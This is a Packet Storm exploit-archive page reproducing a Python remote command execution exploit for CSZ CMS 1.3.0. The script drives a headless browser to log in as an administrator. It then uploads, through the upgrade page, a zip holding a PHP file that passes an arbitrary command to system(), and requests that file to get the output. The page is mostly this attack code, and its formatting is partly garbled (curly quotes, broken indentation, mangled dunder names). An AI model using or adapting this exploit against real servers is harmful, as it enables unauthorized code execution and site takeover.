Security
Headlines
HeadlinesLatestCVEs

Headline

CSZ CMS 1.3.0 Remote Command Execution

CSZ CMS version 1.3.0 suffers from a remote command execution vulnerability. Exploit written in Python.

Packet Storm
#vulnerability#web#mac#windows#linux#git#php#rce#xpath#auth#firefox

Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution

Date: 17/11/2023

Exploit Author: tmrswrr

Vendor Homepage: https://www.cszcms.com/

Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download

Version: Version 1.3.0

Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS

import os
import zipfile
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options as FirefoxOptions
from selenium.webdriver.firefox.service import Service as FirefoxService
from webdriver_manager.firefox import GeckoDriverManager
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException, TimeoutException
import requests
from time import sleep
import sys
import random
import time
import platform
import tarfile
from io import BytesIO

email = “[email protected]
password = “password”

class colors:
OKBLUE = ‘\033[94m’
WARNING = ‘\033[93m’
FAIL = ‘\033[91m’
ENDC = ‘\033[0m’
BOLD = ‘\033[1m’
UNDERLINE = ‘\033[4m’
CBLACK = ‘\33[30m’
CRED = ‘\33[31m’
CGREEN = ‘\33[32m’
CYELLOW = ‘\33[33m’
CBLUE = ‘\33[34m’
CVIOLET = ‘\33[35m’
CBEIGE = ‘\33[36m’
CWHITE = ‘\33[37m’

color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
colors.CRED, colors.CBEIGE]
random.shuffle(color_random)

def entryy():
x = color_random[0] + “"”

╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯

            <<   CSZ CMS Version 1.3.0 RCE     >>  
            <<      CODED BY TMRSWRR           >>  
            <<     GITHUB==>capture0x          >>

\n"""
for c in x:
print(c, end=’’)
sys.stdout.flush()
sleep(0.0045)
oo = " " * 6 + 29 * “░⣿” + “\n\n”
for c in oo:
print(colors.CGREEN + c, end=’’)
sys.stdout.flush()
sleep(0.0065)

tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"  
for c in tt:  
    print(colors.CWHITE + c, end='')  
    sys.stdout.flush()  
    sleep(0.0065)  
xx = " " * 6 + 29 * "░⣿" + "\n\n"  
for c in xx:  
    print(colors.CGREEN + c, end='')  
    sys.stdout.flush()  
    sleep(0.0065)

def check_geckodriver():
current_directory = os.path.dirname(os.path.abspath(file))
geckodriver_path = os.path.join(current_directory, ‘geckodriver’)

if not os.path.isfile(geckodriver_path):  
    red = "\033[91m"  
    reset = "\033[0m"  
    print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)  
    user_input = input("Would you like to download it now? (yes/no): ").lower()  
    if user_input == 'yes':  
        download_geckodriver(current_directory)  
    else:  
        print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)  
        sys.exit(1)

def download_geckodriver(directory):

print("[*] Detecting OS and architecture...")  
os_name = platform.system().lower()  
arch, _ = platform.architecture()

if os_name == "linux":  
    os_name = "linux"  
    arch = "64" if arch == "64bit" else "32"  
elif os_name == "darwin":  
    os_name = "macos"  
    arch = "aarch64" if platform.processor() == "arm" else ""  
elif os_name == "windows":  
    os_name = "win"  
    arch = "64" if arch == "64bit" else "32"  
else:  
    print("[!] Unsupported operating system.")  
    sys.exit(1)

geckodriver_version = "v0.33.0"  
geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"  
ext = "zip" if os_name == "win" else "tar.gz"  
url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"

print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")  
response = requests.get(url, stream=True)

if response.status_code == 200:  
    print("[*] Extracting GeckoDriver...")  
    if ext == "tar.gz":  
        with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:  
            tar.extractall(path=directory)  
    else:     
        with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:  
            zip_ref.extractall(directory)  
    print("[+] GeckoDriver downloaded and extracted successfully.")  
else:  
    print("[!] Failed to download GeckoDriver.")  
    sys.exit(1)

    def create_zip_file(php_filename, zip_filename, php_code):  
try:  
    with open(php_filename, 'w') as file:  
        file.write(php_code)  
    with zipfile.ZipFile(zip_filename, 'w') as zipf:  
        zipf.write(php_filename)  
    print("[+] Zip file created successfully.")  
    os.remove(php_filename)  
    return zip_filename  
except Exception as e:  
    print(f"[!] Error creating zip file: {e}")  
    sys.exit(1)

def main(base_url, command):

if not base_url.endswith('/'):  
    base_url += '/'

        zip_filename = None   

check_geckodriver()  
try:  
    firefox_options = FirefoxOptions()  
    firefox_options.add_argument("--headless")

    script_directory = os.path.dirname(os.path.abspath(__file__))  
    geckodriver_path = os.path.join(script_directory, 'geckodriver')  
    service = FirefoxService(executable_path=geckodriver_path)  
    driver = webdriver.Firefox(service=service, options=firefox_options)  
    print("[*] Exploit initiated.")

    # Login  
    driver.get(base_url + "admin/login")  
    print("[*] Accessing login page...")  
    driver.find_element(By.NAME, "email").send_keys(f"{email}")  
    driver.find_element(By.NAME, "password").send_keys(f"{password}")  
    driver.find_element(By.ID, "login_submit").click()  
    print("[*] Credentials submitted...")

     try:  
        error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")  
        if error_message.is_displayed():  
            print("[!] Login failed: Invalid credentials.")  
            driver.quit()  
            sys.exit(1)  
    except NoSuchElementException:  
        print("[+] Login successful.")

    # File creation    
    print("[*] Preparing exploit files...")  
    php_code = f"<?php echo system('{command}'); ?>"  
    zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)

     driver.get(base_url + "admin/upgrade")  
    print("[*] Uploading exploit payload...")  
    file_input = driver.find_element(By.ID, "file_upload")  
    file_input.send_keys(os.path.join(os.getcwd(), zip_filename))

# Uploading  
    driver.find_element(By.ID, "submit").click()  
    WebDriverWait(driver, 10).until(EC.alert_is_present())  
    alert = driver.switch_to.alert  
    alert.accept()

    # Exploit result   
    exploit_url = base_url + "exploit.php"  
    response = requests.get(exploit_url)  
    print(f"[+] Exploit response:\n\n{response.text}")

except Exception as e:  
    print(f"[!] Error: {e}")  
finally:  
    driver.quit()  
    if zip_filename and os.path.exists(zip_filename):  
        os.remove(zip_filename)

if name == "main":
entryy()
if len(sys.argv) < 3:
print("Usage: python script.py [BASE_URL] [COMMAND]")
else:
main(sys.argv[1], sys.argv[2])

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution